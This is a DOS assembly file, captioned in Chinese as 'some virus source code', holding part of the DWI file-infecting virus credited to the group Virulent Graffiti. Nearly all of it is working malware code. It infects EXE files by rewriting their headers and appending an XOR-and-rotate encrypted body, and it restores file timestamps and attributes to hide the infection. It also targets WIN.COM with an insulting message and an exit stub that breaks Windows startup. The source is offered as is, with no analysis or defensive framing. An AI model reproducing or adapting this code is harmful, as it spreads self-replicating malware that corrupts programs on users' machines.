dwi.asm

一些病毒源代码

     mov       ax, 3D00h                                ; Open File
     int       30h       
     jc        bad_exe

     xchg      ax, bx                                   ; BX = File Handle
     
     mov       ax, 5700h                                ; Get File Date/Time
     int       30h
     
     mov       ftime, cx                                ; Save Time
     mov       fdate, dx                                ; And Date
     
     mov       ah, 3Fh                                  ; Read Header
     mov       cx, 1ah
     mov       dx, offset buffer                        ; Into Buffer
     int       30h     

     call      LSeekEnd                                 ; LSeek the End

     push      dx                                       ; Save File Size
     push      ax

     mov       ah, 3Eh                                  ; Close File
     int       30h
     
     cmp       word ptr [buffer], 'ZM'
     jne       worse_exe                                ; Not an EXE File

     cmp       word ptr [buffer+12h], id_word
     jne       good_exe                                 ; Not Infected

worse_exe:
     pop       dx                                       ; Remove Saved File
     pop       dx                                       ; Size
bad_exe:
     jmp       remove_locks                             ; Abort Infection

good_exe:
     mov       al, 01h                                  ; Overwrite Attribs
     xor       cx, cx
     call      attributes     
     jc        worse_exe                                ; Catch Write-Prot
                                                        ; Discs Here
     push      cs
     pop       es
     
     mov       si, offset buffer + 14h                  ; Save Initial CS:IP
     mov       di, offset jmpsave                       ; In Segment
     
     movsw
     movsw
     
     sub       si, 10                                   ; Save Initial SS:SP
     
     movsw
     movsw
     
     pop       ax dx                                    ; Retrive File Size
     push      ax dx                                    ; Save It

     add       ax, offset end_write - offset entry
     adc       dx, 0
     
     mov       cx, 512                                  ; Pages 512 Bytes
     div       cx             
     or        dx, dx
     jz        no_round
     inc       ax                                       ; Rounding Quirk

no_round:
     mov       word ptr [buffer + 4], ax                ; Set Total 512 pages
     mov       word ptr [buffer + 2], dx                ; Set Total mod 512

     mov       ax, word ptr [buffer + 0Ah]              ; Get Minimum
     add       ax, (end_write - entry)/16               ; Add our Size
     mov       word ptr [buffer + 0ah], ax              ; Put us in Minimum
     mov       word ptr [buffer + 0ch], ax              ; and in the Maximum
     
     pop       dx ax                                    ; Retrieve File Size
     
     mov       cl, 4
     mov       bx, word ptr [buffer + 8]
     shl       bx, cl                                   ; BX = Header Size
     sub       ax, bx
     sbb       dx, 0                                    ; Subtract Header
     
     mov       cx, 10h        
     div       cx                                       ; Change To Para/Rem
     or        dx, dx
     jz        no_padding
     sub       cx, dx                                   ; CX = Bytes to Pad
     inc       ax

no_padding:
     push      cx                                       ; Save Pad Bytes
     sub       ax, 10h        
     mov       word ptr [buffer + 14h], offset entry           ; Set IP
     mov       word ptr [buffer + 16h], ax                     ; Set CS
     mov       word ptr [buffer + 0Eh], ax                     ; Set SS
     mov       word ptr [buffer + 10h], offset end_vir+100h    ; Set SP

move_id:     
     mov       word ptr [buffer + 12h], id_word         ; Set ID Word
                                                        ; Negative Checksum
     
     mov       ax, 3D02h                                ; Open File
     mov       dx, offset fname
     int       30h
     
     xchg      ax, bx                                   ; BX = File Handle

     mov       ah, 40h                                  ; Write File
     mov       cx, 1Ah
     mov       dx, offset buffer
     int       30h

     call      LSeekEnd                                 ; LSeek to End
     
     pop       cx                                       ; Retrieve Padding
     cmp       cx, 16    
     je        no_fixup                                 ; None Needed
     
     mov       ah, 40h                                  ; Write File
     int       30h

no_fixup:
     mov       ah, 2ch                                  ; Get Time
     int       21h

     mov       word ptr [Valu+1], Dx                    ; New Crypt Valu
    
     mov       si, offset writeret                      ; Copy Write
     mov       di, offset tempcrypt                     ; Routine
     mov       cx, (end_write-writeret)
     rep       movsb
    
     call      tempcrypt                                ; Call Write Routine

     mov       ax, 5701h                                ; Set File Time/Date
     mov       cx, ftime
     mov       dx, fdate
     int       30h
     
     mov       ah, 3Eh                                  ; Close File
     int       30h

     mov       al, 01h                                  ; Reset Attribs
     mov       cx, fattr
     call      attributes

     jmp       remove_locks                             ; Remove Int 24h

vir_ident      db   0,'[DWI] AccuPunk/'                 ; Virus and Author
               db     'The Attitude Adjuster'           ; Idents
               
vir_group      db   0,'Virulent Graffiti',0             ; Group Ident

win_com        db   'WIN.COM',0                         ; Target File
win_exit       db   0cdh, 20h                           ; DOS Exit
win_msg        db   0dh,0ah                             ; Message
               db   'You''ve been caught, you DWI! You''re nothing '
               db   'but a Damn  Windows  Idiot!',0dh,0ah
               db   'Well, we at Virulent Graffiti have  had it...  '
               db   'you''re  not going  to be',0dh,0ah
               db   'running that bullshit for a while, ''cuz, hey, '
               db   'friends don''t let friends',0dh,0ah
               db   'use Windows!  (and you''re damn right we''re '
               db   'your friends!)',0dh,0ah,'$'
my24:                                                   ; Error Handler
     mov       al, 3                                    ; Process Terminate
     iret

Attributes:                                             ; Get/Set
     mov       ah, 43h
     mov       dx, offset fname
     int       30h
     ret

LSeekEnd:
     mov       ax, 4202h                                ; LSeek from End
     xor       cx, cx
     cwd                                                ; XOR DX, DX
     int       30h                                      ; Kudos DA
     ret

WriteRet:
     push      bx                                       ; Handle

     mov       bx, offset endcrypt                      ; Virus Start
     mov       cx, (end_write-endcrypt)/2               ; Ieterations
     mov       dx, Word Ptr [Valu+1]                    ; Xor Word
Crypt_Loop2:
     rol       word ptr [bx], 1                         ; Roll it Left!
     xor       word ptr [bx], dx                        ; Xor It 
     inc       bx
     inc       bx
     loop      Crypt_Loop2
     
     pop       bx                                       ; Handle

     mov       ah, 40h                                  ; Write File
     mov       cx, end_write - entry
     mov       dx, offset entry
     int       30h
     
     push      bx                                       ; Handle
     
     mov       bx, offset endcrypt                      ; Virus Start
     mov       cx, (end_write-endcrypt)/2               ; Ieterations
     mov       dx, Word Ptr [Valu+1]                    ; Xor Word     
Crypt_Loop3:
     xor       word ptr [bx], dx                        ; Xor It
     ror       word ptr [bx], 1                         ; Roll it Left!
     inc       bx
     inc       bx
     loop      Crypt_Loop3
     
     pop       bx                                       ; Handle
     ret                                                ; Return
end_write:

  old24          dd   0                                 ; Int 24h Vector
  buffer         db   1Ah dup (0)                       ; EXE Read Buffer
  fname          db   128 dup (0)                       ; Filename Buffer
  fdate          dw   0                                 ; OldFileDate
  ftime          dw   0                                 ; OldFileTime
  fattr          dw   0                                 ; OldFileAttr
  
tempcrypt:      
                 db   (end_write-writeret) Dup(0)       ; Write Routine
end_vir:

     end       entry